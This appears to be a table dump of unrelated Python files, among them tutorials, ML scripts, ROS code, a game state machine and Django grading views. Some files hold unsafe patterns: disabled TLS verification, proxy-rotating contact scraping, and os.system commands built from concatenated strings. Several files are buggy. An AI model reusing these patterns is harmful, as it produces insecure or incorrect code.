text stringlengths 8 6.05M |
|---|
'''
- list type
1. 순서가 있다
2. 여러 type의 데이터를 저장할 수 있다.
3. 값 변경 가능
'''
a=[1,2,3]
b=[10, True, "문자열"]
c=[10,20,30]
d=a #id값 복사
print("a id:",id(a))
print("b id:",id(b))
print("c id:",id(c))
print("d id:",id(d))
print("a[0]:",a[0]) #a[0] 값 불러오기
a[0] = 999; # a[0] 값 수정하기
print("a : ",a)
print("d : ",d)
family = ['엄마','아빠','나']
print('가족 구성원 목록:', family)
print('가족 구성원 수:', len(family))
# list type에 데이터 추가하기
family.append("남동생")
family.append("여동생")
print("데이터 추가 후 .... ")
print("가족 구성원 목록:", family)
print("가족 구성원 수:", len(family))
# list type에서 데이터 제거
# 값에 의한 삭제
family.remove("남동생")
print("남동생 삭제 후 .... ")
print("가족 구성원 목록:", family)
# 인덱스에 의한 삭제
del family[3]
print("여동생 삭제 후 .... ")
print("가족 구성원 목록:", family)
#
popedData = family.pop() # pop() 함수의 리턴타입으로 데이터를 가지고 온다.
print("pop() 후 .... ")
print("가족 구성원 목록:", family)
print("popedData:", popedData)
familyHistory = []
familyHistory.append(popedData)
print("familyHistory:", familyHistory)
# dict type에 회원정보를 담아서
mem1={'num':1, 'name':'김구라', 'addr':'노량진'}
mem2={'num':2, 'name':'해골', 'addr':'행신동'}
mem3={'num':3, 'name':'원숭이', 'addr':'상도동'}
print("mem1 의 name 이라는 키값으로 저장된 값 참조...")
print(mem1['name'])
# list type 에 저장하기
members = [mem1, mem2, mem3]
# list type에 저장된 dict type 참조해보기
print(members[0])
print(members[1])
print(members[2])
# members의 1번 방에 있는 dict type에 addr이라는 키값으로 저장된
# 값 참조해보기
dic1 = members[1]
result = dic1['addr']
print('result:', result)
result2 = members[1]['addr']
print('result2:', result2)
# 특정방을 참조해서 대입연산자를 이용해서 값 수정하기
members[0]['name'] = '개구라'
print('개구라 수정후:', members)
print('개구라 수정후:', mem1)
numbers=[]
numbers.append(10)
numbers.append(40)
numbers.append(50)
numbers.append(20)
numbers.append(30)
print('numbers:',numbers)
# 오름차순 정렬
numbers.sort()
print("정렬 후....")
print(numbers)
# 내림차순 정렬
numbers.sort(reverse=True)
print("numbers 내림차순 정렬 후...")
print(numbers)
# slice 연습
numbers2 = [1,2,3,4,5,6,7,8,9,10]
print(numbers2[0:2]) # 0번 이상 2번 미만
print(numbers2)
print(numbers2[-5:-1])
examData1 = {'num':1, 'name':'김구라', 'eng':100, 'math':80}
examData2 = {'num':2, 'name':'해골', 'eng':90, 'math':70}
examData3 = {'num':3, 'name':'원숭이', 'eng':80, 'math':100}
resultList = [examData1, examData2, examData3]
print(type(range(10)))
# 반복문
for i in range(10):
print(i)
for i in range(len(resultList)):
print(i)
'''
- 다음과 같이 출력해보세요
번호:1 이름:김구라 영어:xx 수학:xx
번호:2 이름:해골 영어:xx 수학:xx
번호:3 이름:원숭이 영어:xx 수학:xx
'''
for i in range(len(resultList)):
print("번호:{} 이름:{} 영어:{} 수학:{}".format(resultList[i]['num'],resultList[i]['name'],resultList[i]['eng'],resultList[i]['math']))
for i in range(len(resultList)):
# i번째 회원정보를 담고 있는 dict객체를 얻어온다.
tmp = resultList[i]
result = "번호:{} 이름:{} 영어:{} 수학:{}"\
.format(tmp['num'],tmp['name'],tmp['eng'],tmp['math'])
print(result)
for a in [10,20,30]:
print(a)
for item in resultList:
result = "번호:{} 이름:{} 영어:{} 수학:{}"\
.format(item['num'],item['name'],item['eng'],item['math'])
print(result) |
import requests
from bs4 import BeautifulSoup
import time
import re
import random
import xlwt
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
class Get_ip(object):
'''
获取ip信息
'''
def __init__(self):
super(Get_ip, self).__init__()
self.url = 'http://www.kuaidaili.com/free/inha/'
self.headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36",
"Accept": "*/*",
"Connection": "Keep-Alive"
}
self.session = requests.session()
def run(self):
'''
获取ip代理
:return:
'''
html = self.session.get(self.url, headers=self.headers).text
soup = BeautifulSoup(html, 'lxml')
tableList = soup.select('#list > table')[0].find_all('tr')
http_ips = []
for tr in tableList[1:]:
type = tr.select('td')[3].get_text()
ipDict = {'ip': '', 'port': ''}
if type == 'HTTP':
ip = tr.select('td')[0].get_text()
port = tr.select('td')[1].get_text()
ipDict['ip'] = ip
ipDict['port'] = port
http_ips.append(ipDict)
print(http_ips)
return http_ips
class Get_urls():
'''
爬取每一页的url,并进入链接
'''
def __init__(self, url, page, ip):
self.page = page
self.url = url
self.proxies = {
'http': 'http://' + ip['ip'] + ':' + ip['port']
}
def get_url(self):
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36"
}
print(self.url + '&beginPage=' + str(self.page))
html = requests.get(self.url + '&beginPage=' + str(self.page),headers=headers, proxies=self.proxies).text
print(html)
soup = BeautifulSoup(html,'lxml')
table = soup.find('div', attrs={'id': 'sw_mod_mainblock'}).find('url').find_all('div', attrs={'class': 'list-item-left'})
urls = []
for item in table:
urls.append(item.find('a').get('href'))
return urls
class Get_contact():
'''
链接1688批发网获取电话与链接信息
'''
def __init__(self, url, ip):
self.proxies = {
'http': 'http://' + ip['ip'] + ip['port']
}
self.url = url
self.headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36"
}
self.session = requests.session()
def run(self):
try:
html = self.session.get(self.url, headers=self.headers, proxies=self.proxies, timeout=2).text
contact_url = BeautifulSoup(html).find('div', attrs={'class': 'top-nav-bar-box'}).find('li', attrs={'data-page-name': 'contactinfo'}).find('a').get('href')
except:
self.statue = 0
print('~~~')
return
self.statue = 1
try:
html = self.session.get(contact_url, headers=self.headers, proxies=self.proxies, timeout=2).text
table = BeautifulSoup(html).find('div', attrs={'class': 'fd-line'}).find_all('dl')
self.title = BeautifulSoup(html).find('div', attrs={'class': 'contact-info'}).find('h4').get_text()
self.infor = []
for item in table[:-1]:
self.infor.append(item.get_text().replace('\n', '').replace('', ''))
except:
self.statue = 0
class Main():
'''
主函数
'''
def __init__(self):
self.f = xlwt.Workbook()
self.sheet = self.f.add_sheet('sheet')
self.count = 0
work = Get_ip()
self.ips = work.run()
def work(self):
'''
https://s.1688.com/company/company_search.htm?keywords=%BE%AB%C3%DC%BB%FA%D0%B5&earseDirect=false&button_click=top&n=y&pageSize=30&offset=3&beginPage=2
'''
search_url = 'https://s.1688.com/company/company_search.htm?keywords=%BE%AB%C3%DC%BB%FA%D0%B5&earseDirect=false&button_click=top&n=y&pageSize=30&offset=3'
for i in range(4):
url_get = Get_urls(search_url, i + 2, self.ips[random.randint(0, len(self.ips) - 1)])
try:
urls = url_get.get_url()
except:
continue
for url in urls:
spider = Get_contact(url, self.ips[random.randint(0, len(self.ips) - 1)])
spider.run()
if spider.statue == 0:
continue
self.sheet.write(self.count, 0, spider.title)
num = 1
for infor in spider.infor:
self.sheet.write(self.count, num, infor)
num += 1
self.count+=1
print(self.count)
self.f.save(r'F:\web项目\爬虫项目\1688\data.xls')
if __name__ == '__main__':
work = Main()
work.work()
|
from math import hypot
class Vector:
def __init__(self, x=0, y=0):
self.x = x
self.y = y
def __repr__(self):
return 'Vector(%r, %r)' % (self.x, self.y)
def __str__(self):
return 'Vector(%r, %r)' % (self.x, self.y)
def __pos__(self):
return Vector(self.x, self.y)
def __neg__(self):
return Vector(-self.x, -self.y)
def __abs__(self):
return hypot(self.x, self.y)
def __bool_(self):
return bool(abs(self))
def __add__(self, otherVector):
return Vector(self.x + otherVector.x, self.y + otherVector.y)
def __sub__(self, otherVector):
return Vector(self.x - otherVector.x, self.y - otherVector.y)
def __mul__(self, scalar):
return Vector(self.x * scalar, self.y * scalar)
__rmul__ = __mul__
def __eq__(self, other):
return (self.x == other.x) and (self.y == other.y)
def __gt__(self, other):
return abs(self) > abs(other)
def __ge__(self, other):
return abs(self) >= abs(other)
firstVector = Vector(3, 4)
secondVector = Vector(5, 12)
print("The first vector is", firstVector)
print("The second vector is", secondVector)
print("The size of the first vector is", abs(firstVector))
print("The size of the second vector is", abs(secondVector))
print("Is the first vector true?", bool(firstVector))
print("Is the second vector true?", bool(secondVector))
print("The sum of the vectors is", firstVector + secondVector)
print("The first vector times 3 is", firstVector * 3)
print("The second vector times 3 is", secondVector * 3)
print("Three times the first vector is", 3 * firstVector)
print("Three times the second vector is", 3 * secondVector)
print("Three times the first vector times 3 is", 3 * firstVector * 3)
print("Three times the second vector times 3 is", 3 * secondVector * 3)
|
yas = 35
emeklilikYasi = 65
simdikiYil = 2020
emeklilikYili = simdikiYil + (emeklilikYasi - yas)
print(emeklilikYili)
print("yılında emekli olabilirsiniz")
|
#!/usr/bin/env python
import numpy as np
import numba
from numba import jit
"""
from cffi import FFI
ffi = FFI()
lib = ffi.dlopen('./test.so')
ffi.cdef('void w3j_ms(double, double, double, double);')
_w3j_ms = lib.___pyx_pw_4test_1w3j_ms
drc3jm = lib.drc3jm_
"""
from test import w3j_ms as _w3j_ms
@jit#(nopython=True)
def w3j_ms(l1, l2, l3, m1):
"""
for l1, l2, l3, m1
returns w3js from m2 from -l2 to +l2
"""
return _w3j_ms(l1, l2, l3, m1)
print(w3j_ms(2,2,2,0))
|
import sys
import copy
import rospy
import moveit_commander
import moveit_msgs.msg
import geometry_msgs.msg
from math import pi
from std_msgs.msg import String
from moveit_commander.conversions import pose_to_list
from urdf_parser_py.urdf import URDF
from pykdl_utils.kdl_kinematics import KDLKinematics
import numpy as np
from tf import transformations
class robot:
def __init__(self):
moveit_commander.roscpp_initialize(sys.argv)
rospy.init_node('qp_ros_interface',
anonymous=True)
group_name = "manipulator"
robot_commander = moveit_commander.RobotCommander()
group = moveit_commander.MoveGroupCommander(group_name)
self.robot_commander = robot_commander
self.group = group
self.pose = self.group.get_current_pose().pose
self.position = np.array([self.pose.position.x, self.pose.position.y, self.pose.position.z])
self.quaternion = np.array([self.pose.orientation.x, self.pose.orientation.y, self.pose.orientation.z, self.pose.orientation.w])
self.joint_status = self.group.get_current_joint_values()
robot = URDF.from_parameter_server()
self.kdl_kin = KDLKinematics(robot, "base_link", "ee_link")
self.jacobian = self.kdl_kin.jacobian(self.joint_status)
def update_joint_status(self):
self.joint_status = self.group.get_current_joint_values()
def update_jacobian(self):
self.joint_status = self.group.get_current_joint_values()
self.jacobian = self.kdl_kin.jacobian(self.joint_status)
def update_pose(self):
self.pose = self.group.get_current_pose().pose
self.position = np.array([[self.pose.position.x],
[self.pose.position.y],
[self.pose.position.z]])
self.quaternion = (self.pose.orientation.x,
self.pose.orientation.y,
self.pose.orientation.z,
self.pose.orientation.w)
def hat(self, x):
x_hat = np.array([[0., -x[2], x[1]],
[x[2], 0., -x[0]],
[-x[1], x[0], 0.]])
return x_hat
def q2R(self, quaternion):
R = transformations.quaternion_matrix(quaternion)
return R
def cal_dJ_dq(self, Fs):
dJ_dq = np.zeros((1, 6))
dq = 0.05
for i in range(6):
joint_status_tmp = self.joint_status
joint_status_tmp[i] += dq
jacobian_new = self.kdl_kin.jacobian(joint_status_tmp)
Fs_new = -0.5*np.linalg.det(np.dot(jacobian_new.T, jacobian_new))
dJ_dq[0,i] = (Fs_new - Fs)/dq
return dJ_dq
def update_states(self):
# self.update_joint_status()
self.update_jacobian()
self.update_pose()
|
from random import randint
def get_number():
"""Get number from user.
Try until user give proper number.
:rtype: int
:return: given number as int
"""
while True:
try:
result = int(input("Guess the number: "))
break
except ValueError:
print("It's not a number")
return result
def guess_the_number():
"""Main function with our game."""
secret_number = randint(1, 100)
given_number = get_number()
while given_number != secret_number:
if given_number < secret_number:
print("Too small!")
else:
print("Too big!")
given_number = get_number()
print("You Win!")
if __name__ == '__main__':
guess_the_number()
|
class DataManager:
def __self__(self, list_of_symbols=None, ):
pass |
from collections import defaultdict
class Solution:
def verticalTraversal(self, root: TreeNode) -> List[List[int]]:
order = defaultdict(list)
def traverse(root,level,h):
if root:
order[level].append((h,root.val))
traverse(root.left,level-1,h+1)
traverse(root.right,level+1,h+1)
return
return
traverse(root,0,1)
result = []
order = sorted(order.items(), key = lambda i:i)
for k, v in dict(order).items():
v_sorted = sorted(v)
tmp = []
for _, n in v_sorted:
tmp.append(n)
result.append(tmp)
return result |
import neuron as n
import numpy as np
class Network(object):
#constuctor of the class
"""
@args:
featureLength: count of node in input layer
noOfNeuronsL1: count of nodes in hidden layer
noOfNeuronsL2: count of nodes in output layer
eta
"""
def __init__(self, featureLength, noOfNeuronsL1, noOfNeuronsL2, eta):
self.weights1=np.random.normal(0.0,pow(featureLength,-.005),(featureLength,noOfNeuronsL1))
self.weights2 = np.random.normal(0.0, pow(noOfNeuronsL1+1, -.005), (noOfNeuronsL1+1, noOfNeuronsL2))
self.eta= eta
'''
@args
trainData: training data in numpy format
trainLabels: train data labels in numpy format
validationData: validation data in numpy formt
validationLabels: in numpy format
'''
def trainNetwork(self,trainData,trainLabels,validationData,validationLabels):
self.bias = np.random.rand(len(trainData), 1)
lis1 = []
lis2 = []
for i in range(0,100):
z1= n.neuron(self.weights1,trainData,"tanh")
z1 = np.column_stack((z1,self.bias))
z2 = n.neuron(self.weights2,z1,"sigmoid")
###### batch gradient descent
diff = (z2-trainLabels)
delta2 = np.dot(z1.transpose(),diff) # gradient of loss function w.r.t to ouput layer weights
self.weights2 = self.weights2 - self.eta*delta2 #output layer weight updates
temp1 =np.dot(diff,self.weights2.transpose())
temp2 = np.multiply(temp1,(1-np.multiply(z1,z1)))
delta1 = np.dot(trainData.transpose(),temp2) #gradient of loss function w.r.t to hidden layer weights
self.weights1 = self.weights1 - self.eta*delta1[:,0:300] # hidden layer weight update
labels = self.testNetwork(validationData)
labelsTrain = self.testNetwork(trainData)
k = self.accuracy(labels, validationLabels)
p = self.accuracy(labelsTrain, trainLabels)
lis1.append(k)
lis2.append(p)
self.writetofile(lis1, lis2)
#function to test the model
def testNetwork(self,testData):
z1 = n.neuron(self.weights1, testData, "tanh")
bias = np.ones((len(z1), 1))
z1 = np.column_stack((z1, bias))
z2 = n.neuron(self.weights2, z1, "sigmoid")
return z2
def accuracy(self, predictedLabels, validationLabels):
cnt = 0
for i in range(len(predictedLabels)):
if np.argmax(predictedLabels[i]) == np.argmax(validationLabels[i]):
cnt = cnt + 1
return float(cnt) / float(len(validationLabels))
def writetofile(self, val, train):
f = open("sol.txt", 'w')
for i in range(len(val)):
f.write(str(val[i]) + "," + str(train[i]))
f.close()
|
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 9 10:23:54 2020
@author: Alex
"""
import numpy as np
import matplotlib.pyplot as plt
#import the simulated annealing methods and the 3 dimensional NLL function
from Annealing import Main
from Analysis_Methods import NLL_2
#apply the sim annealing method and calculate the parameter chain
chain = Main(NLL_2)
#caculate the steps for plotting
steps = np.arange(len(chain))
#format graphs
plt.figure(figsize=(10,6))
plt.rc('xtick', labelsize=15)
plt.rc('ytick', labelsize=15)
plt.rc('figure', titlesize=45)
plt.rc('axes', titlesize=20) # fontsize of the axes title
plt.rc('axes', labelsize=20)
plt.rc('legend', fontsize=22)
#plot the variation of each parameter as a function of step
plt.plot(steps, ParamChain[:, 0], 'r-')
plt.plot(steps, ParamChain[:, 1], 'b-')
plt.plot(steps, ParamChain[:, 2], 'g-')
plt.grid()
plt.xlabel("No. of Steps")
plt.ylabel("Parameter Value")
plt.legend(["θ","Δm", "α"])
plt.show()
#plot the variation of system temperature as a function of step
temps = np.arange(0, 15, 0.1)
temps = 10*np.exp(-temps)
steps = np.arange(0, 1.5e6, 10000) + 5000
plt.figure(figsize=(10,6))
plt.rc('xtick', labelsize=15)
plt.rc('ytick', labelsize=15)
plt.rc('figure', titlesize=45)
plt.rc('axes', titlesize=20) # fontsize of the axes title
plt.rc('axes', labelsize=20)
plt.rc('legend', fontsize=22)
plt.plot(steps, temps, 'r-')
plt.grid()
plt.xlabel("No. of Steps")
plt.ylabel("Temperature")
plt.show()
array([0.77812787, 0.00217278, 1.82031335])
|
# Implement Naïve Bayes method using scikit-learn library
# Use train_test_split to create training and testing part
# Evaluate the model on test part
# importing libraries
from sklearn.naive_bayes import GaussianNB
import pandas as pds
from sklearn.metrics import accuracy_score
from sklearn import metrics
from sklearn.model_selection import train_test_split
# fetching the data from glass.csv file
train_df = pds.read_csv('glass.csv')
X_train_drop = train_df.drop("Type", axis=1)
Y_train = train_df["Type"]
# creating training and testing part from train_test_split function
X_train, X_test, y_train, y_test = train_test_split(X_train_drop, Y_train, test_size=0.25)
# calling the naive bayes classifier model and training the model with the train sets using the fit method
NBModel = GaussianNB()
NBModel.fit(X_test, y_test)
# predicting test data using predict function
predict = NBModel.predict(X_test)
# evaluating the model by calculating the accuracy score
accuracy_score(y_test, predict)
print("\nclassification_report :\n", metrics.classification_report(y_test, predict) ) |
def gcd(a, b):
for d in range(min(a, b), 0, -1):
if a % d == 0 and b % d == 0:
return d
def lcm(a, b):
return a * b / gcd(a, b)
num_tests = int(raw_input())
for test_index in range(num_tests):
num_sensors = int(raw_input())
sensor_intervals = map(int, raw_input().split())
min_lcm = -1
for sensor_index_a in range(num_sensors - 1):
interval_a = sensor_intervals[sensor_index_a]
for interval_b in sensor_intervals[sensor_index_a + 1:]:
lcm_ab = lcm(interval_a, interval_b)
if min_lcm == -1 or lcm_ab < min_lcm:
min_lcm = lcm_ab
print(min_lcm)
|
import pydot
import os
os.environ["PATH"] += os.pathsep + 'C:/Program Files (x86)/Graphviz/bin/'
rootDir = "project/ceo"
a=["skyblue","yellow"]
x=0
G = pydot.Dot(graph_type="digraph")
node = pydot.Node(rootDir.split('/')[-1], style="filled", fillcolor="green")
G.add_node(node)
for root , dirs ,files in os.walk(rootDir):
print(dirs)
root=root.split('\\''')[-1]
for subdir in dirs:
node = pydot.Node(subdir, style="filled", fillcolor=a[x])
G.add_node(node)
edge = pydot.Edge(root.split('/')[-1], subdir)
G.add_edge(edge)
print (a[x])
x=x+1
if(x>1):
x=0
print (root)
G.write_png('example1_graph.png')
|
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 24 11:23:03 2018
@author: HP
"""
#"python is good" ">" "good is python"
#def reverse(s):
# return " ".join(reversed(s.split()))
#s = "python is good"
#print(reverse(s))
#def revers(s):
# s = s.split()
# s.reverse()
# return s
#s = "hi hello how are you"
#print(revers(s))
def rever(s):
# s = s.split()
return " ".join(s.split()[::-1])
# return " ".join(s.split())[::-1] even letters will get reversed
s = "hi hello"
print(rever(s))
|
# -*- coding: utf-8 -*-
from django.shortcuts import get_object_or_404, render_to_response
from django.contrib.auth.decorators import login_required
from django.template import RequestContext
from django.conf import settings
from Teste.models import TesteQuestao, Fontes
#-----------------------AJAX----------------------
from django.core import serializers
from django.http import HttpResponse
#from django.shortcuts import render_to_response
#from DjangoAjax.contatos.models import Contatos
from Teste.models import Contatos
#-----------------------AJAX----------------------
def index(request):
return render_to_response('Teste/testeAjax.html',)
def get_contatos(request):
contatos = Contatos.objects.all()
retorno = serializers.serialize("json", contatos)
return HttpResponse(retorno, mimetype="text/javascript")
def xhr_test(request):
if request.is_ajax():
message = "Hello AJAX"
else:
message = "Hello"
return HttpResponse(message)
#import commands
import os
def compilar(questao,user):
#verifica se existe a pasta, se nao existe ele cria
if not os.path.exists(settings.MEDIA_ROOT + """execs/"""+user.username):
os.makedirs (settings.MEDIA_ROOT + """execs/"""+user.username)
#caminho pro arquivo makefile gerado dinamicamente
pathMkFile = os.path.join(settings.MEDIA_ROOT,"fontes",str(questao.user.username),"makefile")
#gera o makefile dos fontes
#questao.gerar_makefile()
#compila usando makefile dos fontes
command = "make -f " + pathMkFile
#output = commands.getoutput(command)
output = os.system(command)
#depois de compilar limpa os arquivos .o gerados
os.system("make clean -f " + pathMkFile)
return output
@login_required
def testeCompilacao(request,questao_id):
user = request.user
questao = get_object_or_404(TesteQuestao,pk=questao_id)
ret = compilar(questao,user)
return render_to_response('Teste/testeCompilacao.html', locals(),context_instance=RequestContext(request))
def rodar(questao,user):
#verifica se existe a pasta de usuario em execs, se nao existe ele cria
if not os.path.exists(settings.MEDIA_ROOT + """execs/"""+user.username):
os.makedirs (settings.MEDIA_ROOT + """execs/"""+user.username)
#verifica se existe a pasta de usuario em saida, se nao existe ele cria
if not os.path.exists(settings.MEDIA_ROOT + """saida/"""+user.username):
os.makedirs (settings.MEDIA_ROOT + """saida/"""+user.username)
command = settings.MEDIA_ROOT + """execs/"""+user.username+"""/"""+ questao.titulo
command += " < "+ settings.MEDIA_ROOT + questao.entrada.__str__() +""" > """ + settings.MEDIA_ROOT + """saida/"""+user.username+"""/"""+questao.titulo
#output = """"""+settings.MEDIA_ROOT
#output = commands.getoutput(command)
output = os.system(command)
return output
@login_required
def testeRodar(request, questao_id):
user = request.user
questao = get_object_or_404(TesteQuestao,pk=questao_id)
ret = rodar(questao,user)
return render_to_response('Teste/testeRodar.html', locals(),context_instance=RequestContext(request))
def comparar(questao,user):
#verifica se existe a pasta de usuario em saida, se nao existe ele cria
if not os.path.exists(settings.MEDIA_ROOT + """saida/"""+user.username):
os.makedirs (settings.MEDIA_ROOT + """saida/"""+user.username)
command ="""diff """ + settings.MEDIA_ROOT + """saida/"""+user.username+"""/"""+ questao.titulo +""" """ + settings.MEDIA_ROOT + """saidaRef/"""+questao.titulo
#output = """"""+settings.MEDIA_ROOT
#output = commands.getoutput(command)
output = os.system(command)
return output
@login_required
def testeComparacao(request, questao_id):
user = request.user
questao = get_object_or_404(TesteQuestao,pk=questao_id)
ret = comparar(questao,user)
return render_to_response('Teste/testeRodar.html', locals(),context_instance=RequestContext(request))
def removerTudoQuestao(user,questao):
pathExec = settings.MEDIA_ROOT + """execs/"""+user.username+"/"
execFilePath = pathExec + questao.titulo
pathSaida = settings.MEDIA_ROOT + """saida/"""+user.username+"/"
saidaFilePath = pathSaida + questao.titulo
for fonte in questao.fontes.all():
pathFontes = settings.MEDIA_ROOT + """fonte/"""+user.username
sourceFilePath = settings.MEDIA_ROOT + fonte.fonte.__str__()
mkFilePath = os.path.join(pathFontes,"makefile")
#remove os fontes
if os.path.exists(pathFontes):
os.remove(sourceFilePath)
#remover makefile?
#os.remove(mkFilePath)
#remove o exetucavel
if os.path.exists(pathExec):
os.remove(execFilePath)
#remove o saida
if os.path.exists(pathSaida):
os.remove(saidaFilePath)
return True
@login_required
def testeTudo(request,questao_id):
user = request.user
questao = get_object_or_404(TesteQuestao,pk=questao_id)
ret1 = compilar(questao,user)
ret2 = rodar(questao,user)
ret3 = comparar(questao,user)
ret =str(ret1)+"\n\n"+str(ret2)+"\n\n"+str(ret3)+"\n\n"
removerTudoQuestao(user,questao)
return render_to_response('Teste/testeRodar.html', locals(),context_instance=RequestContext(request))
|
import random
import app
from physics import Component as PhysicsComponent
from animation import Animation, AnimationFactory
from config import Player as config
# Player controls
class Controls:
END = 0
JUMP = 1
LEFT = 2
RIGHT = 3
GROUND = 4
ATTACK = 5
class State(object):
def __init__(self, model):
self.model = model
def update(self): pass
def on_start(self): pass
def on_end(self): pass
class AnimatedState(State):
def __init__(self, model, animation):
super(AnimatedState, self).__init__(model)
self.animation = animation
def on_start(self):
self.model.animation = self.animation
self.animation.reset()
def on_finished(self):
self.model.control(Controls.END)
def update(self):
super(AnimatedState, self).update()
if self.animation.finished:
self.on_finished()
class MoveState(AnimatedState):
def __init__(self, model, animation, speed):
super(MoveState, self).__init__(model, animation)
self.speed = speed
def update(self):
super(MoveState, self).update()
self.model.physics.position.x += self.speed
class JumpState(AnimatedState):
def __init__(self, model, animation, force):
super(JumpState, self).__init__(model, animation)
self.force = force
def update(self):
super(JumpState, self).update()
if self.model.physics.ground:
self.on_ground()
def on_start(self):
super(JumpState, self).on_start()
if self.model.physics.ground:
self.model.physics.velocity.y -= self.force
def on_ground(self):
self.model.control(Controls.GROUND)
class JumpMoveState(JumpState):
def __init__(self, model, animation, speed, force):
super(JumpMoveState, self).__init__(model, animation, force)
self.speed = speed
def update(self):
super(JumpMoveState, self).update()
self.model.physics.position.x += self.speed
class Model(app.Drawable):
def __init__(self):
self.physics = PhysicsComponent(config['size'])
fact = AnimationFactory()
self.states = {
'idle_left': AnimatedState(self, fact.get('idle_left')),
'idle_right': AnimatedState(self, fact.get('idle_right')),
'walk_left': MoveState(self, fact.get('walk_left'), -config['speeds']['walk']),
'walk_right': MoveState(self, fact.get('walk_right'), config['speeds']['walk']),
'idle_jump_left': JumpState(self, fact.get('jump_left', loop=False), config['accelerations']['jump']),
'idle_jump_right': JumpState(self, fact.get('jump_right', loop=False), config['accelerations']['jump']),
'jump_left': JumpMoveState(self, fact.get('jump_left', loop=False), -config['speeds']['walk'], config['accelerations']['jump']),
'jump_right': JumpMoveState(self, fact.get('jump_right', loop=False), config['speeds']['walk'], config['accelerations']['jump']),
'attack_left': AnimatedState(self, fact.get('vomit_left', loop=False)),
'attack_right': AnimatedState(self, fact.get('vomit_right', loop=False)),
}
self.transitions = {
'idle_left': {
(Controls.LEFT, True): 'walk_left',
(Controls.RIGHT, True): 'walk_right',
(Controls.JUMP, True): 'idle_jump_left',
(Controls.ATTACK, True): 'attack_left'
},
'idle_right': {
(Controls.LEFT, True): 'walk_left',
(Controls.RIGHT, True): 'walk_right',
(Controls.JUMP, True): 'idle_jump_right',
(Controls.ATTACK, True): 'attack_right'
},
'walk_left': {
(Controls.LEFT, False): 'idle_left',
(Controls.RIGHT, True): 'walk_right',
(Controls.JUMP, True): 'jump_left',
(Controls.ATTACK, True): 'attack_left'
},
'walk_right': {
(Controls.LEFT, True): 'walk_left',
(Controls.RIGHT, False): 'idle_right',
(Controls.JUMP, True): 'jump_right',
(Controls.ATTACK, True): 'attack_right'
},
'idle_jump_left': {
(Controls.GROUND, True): 'idle_left',
(Controls.LEFT, True): 'jump_left',
(Controls.RIGHT, True): 'jump_right'
},
'idle_jump_right': {
(Controls.GROUND, True): 'idle_right',
(Controls.RIGHT, True): 'jump_right',
(Controls.LEFT, True): 'jump_left'
},
'jump_left': {
(Controls.GROUND, True): 'walk_left',
(Controls.LEFT, False): 'idle_jump_left'
},
'jump_right': {
(Controls.GROUND, True): 'walk_right',
(Controls.RIGHT, False): 'idle_jump_right'
},
'attack_left': {
(Controls.END, True): 'idle_left'
},
'attack_right': {
(Controls.END, True): 'idle_right'
}
}
self.animation = None
self.saved_state_key = self.state_key = 'idle_' \
+ random.choice(['left', 'right'])
self.state = self.states[self.state_key]
self.state.on_start()
def update(self):
self.physics.update()
if self.state:
self.state.update()
if self.state_key != self.saved_state_key:
self.saved_state_key = self.state_key
self.state.on_end()
self.state = self.states[self.state_key]
self.state.on_start()
self.animation.advance()
def control(self, control, pred=True):
try:
self.state_key = self.transitions[self.state_key][(control, pred)]
except KeyError:
pass
def render(self, graphics):
graphics.push_state()
x, y = self.physics.position
graphics.translate(x, y)
graphics.draw(self.animation)
graphics.pop_state()
|
numeros1=int(input("Digite o primeiro número:"))
numeros2=int(input("Digite o segundo número:"))
numeros3=int(input("Digite o terceiro número:"))
if numeros1 < numeros2 < numeros3:
print("crescente")
else:
print("não está em ordem crescente")
|
#!/usr/bin/env python
import threading
import logging
import sys
from dockercommon import execute, fix_collectd_file, fix_signalfx_collectd_file, repeated_http_get
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
logger = logging.getLogger(__name__)
fix_signalfx_collectd_file()
fix_collectd_file()
execute(["service", "apache2", "start"], expected_code=0)
execute(["service", "collectd", "start"], expected_code=0)
threads = [
threading.Thread(target=repeated_http_get, args=("/index.html", .1, 80)),
threading.Thread(target=repeated_http_get, args=("/nothere", .2, 80))
]
[t.start() for t in threads]
[t.join() for t in threads if t is not None and t.isAlive()]
|
import torch
import ZZYResNet18
model = ZZYResNet18.ZZYResNet18_indices(n_classes=10)
model.load_state_dict(torch.load("./cifar_net89.pth"))
model.eval()
conv1 = model.conv1
maxpool = model.maxpool
conv2_x = model.conv2_x
conv2_x_bb1_conv1 = conv2_x[0].conv1
conv2_x_bb1_conv2 = conv2_x[0].conv2
conv2_x_bb2_conv1 = conv2_x[1].conv1
conv2_x_bb2_conv2 = conv2_x[1].conv2
conv3_x = model.conv3_x
conv3_x_bb1_conv1 = conv3_x[0].conv1
conv3_x_bb1_conv2 = conv3_x[0].conv2
conv3_x_bb2_conv1 = conv3_x[1].conv1
conv3_x_bb2_conv2 = conv3_x[1].conv2
conv4_x = model.conv4_x
conv4_x_bb1_conv1 = conv4_x[0].conv1
conv4_x_bb1_conv2 = conv4_x[0].conv2
conv4_x_bb2_conv1 = conv4_x[1].conv1
conv4_x_bb2_conv2 = conv4_x[1].conv2
conv5_x = model.conv5_x
conv5_x_bb1_conv1 = conv5_x[0].conv1
conv5_x_bb1_conv2 = conv5_x[0].conv2
conv5_x_bb2_conv1 = conv5_x[1].conv1
conv5_x_bb2_conv2 = conv5_x[1].conv2
def deconv(feature_map, conv):
output_padding = 0 if conv.stride[0] == 1 else 1
return torch.nn.functional.conv_transpose2d(feature_map[:, :, :, :].transpose(2, 3), conv.weight[:, :, :, :],
bias=None, stride=conv.stride, padding=conv.padding, output_padding=output_padding, groups=1,
dilation=1)
class FeatureMapSaver():
def __init__(self, module):
self.hook = module.register_forward_hook(self.hook_fn)
def hook_fn(self, module, input, output):
self.feature_map = output
def close(self):
self.hook.remove()
fms_conv5_x_bb2_conv2 = FeatureMapSaver(conv5_x_bb2_conv2)
class IndicesSaver():
def __init__(self, module):
self.hook = module.register_forward_hook(self.hook_fn)
def hook_fn(self, module, input, output):
self.indices = output[1]
def close(self):
self.hook.remove()
